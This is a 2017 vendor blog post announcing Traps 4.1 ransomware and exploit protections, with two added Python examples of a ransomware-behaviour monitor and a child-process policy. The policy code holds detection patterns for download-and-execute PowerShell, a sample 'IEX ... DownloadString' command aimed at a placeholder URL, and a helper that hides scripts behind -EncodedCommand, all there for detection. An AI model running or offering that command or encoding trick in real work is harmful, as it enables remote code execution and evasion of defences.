# Traps: Expanding Ransomware Protection for Current and Future Threats

By [Joel Boyd](https://www.paloaltonetworks.com/blog/author/joel-boyd/?ts=markdown "Posts by Joel Boyd") | Sep 19, 2017 | 5 minutes

[Announcement](https://www.paloaltonetworks.com/blog/category/announcement/?ts=markdown) [Endpoint](https://www.paloaltonetworks.com/blog/category/endpoint-2/?ts=markdown) [Advanced Endpoint Protection](https://www.paloaltonetworks.com/blog/tag/advanced-endpoint-protection/?ts=markdown) [Traps](https://www.paloaltonetworks.com/blog/tag/traps/?ts=markdown) [Traps 4.1](https://www.paloaltonetworks.com/blog/tag/traps-4-1/?ts=markdown)

Today [we announced the next iteration of Traps advanced endpoint protection](https://www.paloaltonetworks.com/company/press/2017/palo-alto-networks-strengthens-ransomware-prevention-capabilities-with-new-traps-advanced-endpoint-functionality), Traps 4.1.
With this release, we continue to develop our multi-method prevention approach to endpoint security, with a specific focus on preventing ransomware. Many estimates put the total value of ransoms paid out in 2016 at more than $1 billion^1^, but the ransom itself often pales in comparison to what follows:

* Engaging disaster recovery on a massive scale
* Bringing user machines, and then larger production and operational systems, back online
* Dealing with low employee morale, lost productivity and potential breach notifications
* Figuring out how to prevent the attack from happening again
* Determining whether the organization is still vulnerable

The majority of ransomware does its damage in less than a minute^2^, far too quickly for endpoint detection and response (EDR) or manual intervention to counter. Neither fixes the underlying issue, either: the ransomware has already compromised user machines, and the organization remains exposed to additional and ongoing attacks.

Compounding the problem, organizations that rely on signature updates have large windows of vulnerability. The speed of signature distribution has improved, but when a member of a signature-based threat-sharing community is infected, creating and distributing a signature from that "patient zero" can still take hours or days, far longer than the minutes ransomware needs to spread to other machines.

The ransomware market itself also continues to evolve. "Ransomware as a service" gives even novice attackers access to advanced techniques. Recent leaks of exploit tooling, together with the return of exploits that remove the need for any user action, have given rise to script-based and file-less attacks, which are a problem for products and tools that rely heavily on analyzing file characteristics.

## **Key New Features in Traps 4.1**

> *"It has been exciting to see the evolution of Traps. Red Sky is proud to be an early adopter of the technology and has been heavily integrated with the product development lifecycle. With the new game-changing additions of anti-ransomware for Windows and static analysis on macOS, Traps has been lab tested and proven to be an industry leader in prevention-based endpoint protection."*
>
> Phil Wong | Security Practice Lead at Red Sky

## **New Exploits and Ransomware**

While thousands of individual exploits exist, only a handful of exploit techniques are used to deliver them. Traps focuses on blocking those techniques, which shuts down exploit-based attacks without relying on signatures or chasing each exploit one at a time.

Recently, a technique seen in both WannaCry and NotPetya directly exploits, and then lives in, the kernel. Microsoft patched the Server Message Block (SMB) vulnerability in Windows (MS17-010) in March 2017, months before either outbreak, yet many organizations were still vulnerable to the first step of the attack, exploiting SMB over the network, simply because they had not applied the patch. The second step installs the now-infamous DoublePulsar backdoor, which runs in kernel mode and can inject shellcode from the kernel into the memory of a legitimate user-mode process and have that process run it. Nothing malicious needs to be written to disk, which makes the attack file-less.

**Enhanced kernel exploit protection**: Traps already blocked actions aimed at gaining kernel access through privilege escalation. The new kernel exploit protection in 4.1 targets the techniques used to execute a malicious payload once the kernel has been exploited, such as those used by WannaCry and NotPetya. By blocking processes from running code injected into them from the kernel, Traps prevents these attacks early in the attack lifecycle without impacting legitimate processes.

**Behavior-based ransomware protection**: This release introduces a capability focused solely on ransomware rather than on malware in general. In addition to its existing preventions, Traps now monitors specifically for ransomware behavior and, on detection, blocks the attack and the encryption of customer data without interfering with legitimate encryption tools.

## **Script-Based and File-Less Attacks**

Many approaches to malware prevention, legacy and next-generation alike, revolve around analyzing the features and characteristics of a file. Attackers have responded by abusing legitimate processes and by running script-based attacks that may involve no file at all.

**Granular child process protection and malicious DLL prevention**: With 4.1, Traps improves its ability to ensure that legitimate processes run only how and when they should, adding evaluation of a process's command line to its existing blacklisting and whitelisting of parent and child processes. Attackers are also increasingly delivering their code as DLLs rather than as traditional executables. To counter this, Traps now examines DLLs with both its local analysis and its cloud-based WildFire analysis for known and unknown malware.

## **The Rise of Mac Malware**

Though malware on macOS is still a growing field, attackers know that where there is an assumption of safety there is opportunity for profit. As one example, in early May 2017 a well-known Windows backdoor, Snake, was ported to macOS for the first time. As Mac use continues to grow throughout enterprises, security teams need to ensure those users are protected.

**Local analysis on macOS**: Traps takes the same multi-method prevention approach on Mac endpoints. Traps 4.0 delivered exploit protection specific to macOS, enhanced Gatekeeper protection and WildFire integration for known malware. Traps 4.1 adds local analysis to detect and prevent unknown malware variants on macOS.
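The behavior-based ransomware protection described under "New Exploits and Ransomware" above rests on watching what a process does to files, not on what a file looks like. The Python script below is an added example of that kind of monitor, written for this page; it is not Traps's detection logic. It keeps a sliding window of file events per process and blocks a process that overwrites many user documents with high-entropy (encrypted-looking) data in a short time, while a single deliberate gpg run and a bulk file renamer pass untouched. The event format, the thresholds, the process names and the sample trace are all constructed.

```python
"""Illustrative behavior-based ransomware monitor over a stream of file events.

Added example for this page, not Traps's detection logic: the event format,
the thresholds, the process names and the sample trace are all constructed.
"""
import math
import os
from collections import defaultdict, deque
from dataclasses import dataclass


@dataclass(frozen=True)
class FileEvent:
    ts: float            # seconds since the start of the trace
    pid: int
    process: str         # image name of the process doing the operation
    op: str              # "write" (in place) or "rename"
    path: str
    data: bytes = b""    # bytes written, for "write"
    new_path: str = ""   # destination, for "rename"


WINDOW_SECONDS = 10.0    # how far back one process's activity is examined
MIN_FILES = 5            # distinct user documents hit inside the window
HIGH_ENTROPY = 7.0       # bits per byte; ciphertext sits close to 8.0
DOC_EXTENSIONS = {".docx", ".xlsx", ".pdf", ".jpg", ".txt"}


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for empty or constant input, at most 8.0."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def _ext(path: str) -> str:
    return os.path.splitext(path)[1].lower()


class RansomwareMonitor:
    """Blocks a process whose recent file activity looks like mass encryption.

    A pid is flagged only when, inside WINDOW_SECONDS, it touched at least
    MIN_FILES distinct user documents AND overwrote at least one of them in
    place with high-entropy data. The entropy signal keeps a bulk renamer or a
    tool that encrypts one file to a new path (gpg, a zip utility) from
    tripping the rule; the volume requirement keeps a user encrypting a single
    document from tripping it either.
    """

    def __init__(self):
        self._recent = defaultdict(deque)   # pid -> events still inside the window
        self.blocked = []                    # (ts, pid, process), in detection order

    def observe(self, ev: FileEvent) -> str:
        """Feed one event; returns "block" once a pid has crossed the threshold."""
        if any(pid == ev.pid for _, pid, _ in self.blocked):
            return "block"
        q = self._recent[ev.pid]
        q.append(ev)
        while q and ev.ts - q[0].ts > WINDOW_SECONDS:
            q.popleft()
        if self._looks_like_ransomware(q):
            self.blocked.append((ev.ts, ev.pid, ev.process))
            return "block"
        return "allow"

    @staticmethod
    def _looks_like_ransomware(window) -> bool:
        overwritten, renamed = set(), set()
        for e in window:
            if (e.op == "write" and _ext(e.path) in DOC_EXTENSIONS
                    and shannon_entropy(e.data) >= HIGH_ENTROPY):
                overwritten.add(e.path)
            elif (e.op == "rename" and _ext(e.path) in DOC_EXTENSIONS
                    and _ext(e.new_path) not in DOC_EXTENSIONS):
                renamed.add(e.path)
        return bool(overwritten) and len(overwritten | renamed) >= MIN_FILES


CIPHERTEXT = bytes(range(256)) * 4                  # stand-in for encrypted output, entropy 8.0
PLAINTEXT = b"Quarterly numbers look good.\n" * 40   # ordinary document content


def sample_trace():
    """Constructed trace: a user edit, a deliberate gpg run, a bulk renamer, then ransomware."""
    ev = [FileEvent(0.0, 100, "winword.exe", "write", "/home/u/report.docx", PLAINTEXT),
          FileEvent(1.0, 200, "gpg", "write", "/home/u/report.pdf.gpg", CIPHERTEXT)]
    for i in range(6):   # many documents renamed, none encrypted
        ev.append(FileEvent(2.0 + i * 0.1, 300, "bulk_rename.exe", "rename",
                            f"/home/u/photos/img{i}.jpg", new_path=f"/home/u/photos/img{i}.bak"))
    for i in range(5):   # overwrite each document in place, then rename it
        p = f"/home/u/docs/file{i}.docx"
        ev.append(FileEvent(5.0 + i * 0.1, 400, "invoice_viewer.exe", "write", p, CIPHERTEXT))
        ev.append(FileEvent(5.05 + i * 0.1, 400, "invoice_viewer.exe", "rename", p,
                            new_path=p + ".locked"))
    return ev


def run(events):
    """Replays events in time order; returns the pids blocked, in detection order."""
    mon = RansomwareMonitor()
    for e in sorted(events, key=lambda e: e.ts):
        mon.observe(e)
    return [pid for _, pid, _ in mon.blocked]


if __name__ == "__main__":
    print(run(sample_trace()))   # [400]: only the in-place mass encryptor is blocked
```

Two design points carry over to any real implementation. First, the distinction between ransomware and a legitimate encryption tool is made on behavior (volume plus in-place high-entropy overwrites), not on the process name, because an allowlist keyed on names is defeated by a renamed binary. Second, the verdict arrives on the fifth document, so the protection only has value if the block is enforced before that write reaches disk (in a file-system filter), and the thresholds have to be tuned against the baseline activity of real users and backup jobs.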
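The granular child process protection described under "Script-Based and File-Less Attacks" above adds command-line evaluation to parent/child process rules. The Python below is an added example of that kind of policy, written for this page; it is not Traps's policy engine or rule set. It blocks Office applications from launching script hosts, allows a known-good parent/child pair, and decodes PowerShell's -EncodedCommand (Base64 of UTF-16LE) so that a download-and-execute script behind an otherwise innocuous parent is still caught. The rules, the process names and the sample events are constructed, and the URL in the sample is a placeholder.

```python
"""Illustrative child-process policy that also evaluates the new process's command line.

Added example for this page, not Traps's policy engine: the rule set, the process
names and the sample events are constructed, and the URL is a placeholder.
"""
import base64
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    parent: str      # image name of the creating (parent) process
    child: str       # image name of the new process
    cmdline: str     # full command line of the new process


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Parent/child pairs that are normal (here: the 64-bit print spooler helper).
ALLOWED_PAIRS = {("winword.exe", "splwow64.exe"), ("excel.exe", "splwow64.exe")}

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...);
# the mandatory whitespace after the switch keeps -ExecutionPolicy from matching.
ENCODED_RE = re.compile(r"-e(?:ncodedcommand|ncoded|nc|c)?\s+([A-Za-z0-9+/=]+)", re.I)
SUSPICIOUS = [
    (re.compile(r"downloadstring|downloadfile", re.I), "downloads code over the network"),
    (re.compile(r"\biex\b|invoke-expression", re.I), "evaluates a string as code"),
    (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), "hides its window"),
    (re.compile(r"frombase64string", re.I), "decodes an embedded payload"),
]


def decode_encoded_command(cmdline: str):
    """Returns the script hidden in -EncodedCommand (Base64 of UTF-16LE), or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return "<undecodable -EncodedCommand>"


def evaluate(ev: ProcessEvent):
    """Returns ("allow" | "block", reason) for one process-creation event."""
    parent, child = ev.parent.lower(), ev.child.lower()
    if (parent, child) in ALLOWED_PAIRS:
        return "allow", "known-good parent/child pair"
    if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
        return "block", f"{parent} should never launch {child}"
    text = ev.cmdline
    decoded = decode_encoded_command(text)
    if decoded is not None:
        text = f"{text} {decoded}"       # judge the decoded script, not just the wrapper
    for pattern, why in SUSPICIOUS:
        if pattern.search(text):
            return "block", f"command line {why}"
    return "allow", "no rule matched"


def encode_for_powershell(script: str) -> str:
    """How an attacker (or an admin) wraps a script for -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


SAMPLE_EVENTS = [   # constructed for illustration
    ProcessEvent("explorer.exe", "powershell.exe", "powershell.exe -NoLogo -Command Get-Service"),
    ProcessEvent("winword.exe", "splwow64.exe", "splwow64.exe 12288"),
    ProcessEvent("winword.exe", "cmd.exe", "cmd.exe /c echo hello"),
    ProcessEvent("explorer.exe", "powershell.exe",
                 "powershell.exe -ExecutionPolicy Bypass -enc " + encode_for_powershell(
                     "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')")),
    ProcessEvent("explorer.exe", "notepad.exe", "notepad.exe notes.txt"),
]


def evaluate_all(events):
    return [evaluate(e)[0] for e in events]


if __name__ == "__main__":
    for e, (verdict, why) in zip(SAMPLE_EVENTS, map(evaluate, SAMPLE_EVENTS)):
        print(f"{verdict:5} {e.parent} -> {e.child}: {why}")
```

The fourth event is the one that parent/child rules alone cannot catch: explorer.exe launching powershell.exe is what happens whenever a user double-clicks a shortcut, so the pair has to stay allowed, and the malicious intent is visible only after the Base64 blob is decoded. The decoder also has to tolerate PowerShell's abbreviated switch forms, which is why the regex matches -e, -ec and -enc as well as the full name while declining -ExecutionPolicy.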
## **Where Can I Learn More?**

* [Sign up for a live demo](https://www.eiseverywhere.com/ehome/270986) of Traps.
* Check out how Traps prevents popular attacks such as [Astrum](https://www.paloaltonetworks.com/blog/2017/07/how-traps-protects-against-astrum/), [Ursnif](https://www.paloaltonetworks.com/blog/2017/06/traps-sniffs-ursnif-banking-trojan/) and [Cerber](https://www.paloaltonetworks.com/blog/2017/04/traps-prevents-cerber-ransomwares-bite/).
* [Read up on the "patient zero" problem](http://go.paloaltonetworks.com/IDCTechSpotlight) in an IDC white paper that examines how the evolution of malware has created the need for a modern approach to endpoint protection.
* Check out the [New Feature Guide](https://www.paloaltonetworks.com/documentation/41/endpoint/newfeaturesguide.html) for details on the new capabilities.

1: [https://www.nbcnews.com/tech/security/ransomware-now-billion-dollar-year-crime-growing-n704646](https://www.nbcnews.com/tech/security/ransomware-now-billion-dollar-year-crime-growing-n704646)

2: [https://blog.barkly.com/how-fast-does-ransomware-encrypt-files](https://blog.barkly.com/how-fast-does-ransomware-encrypt-files)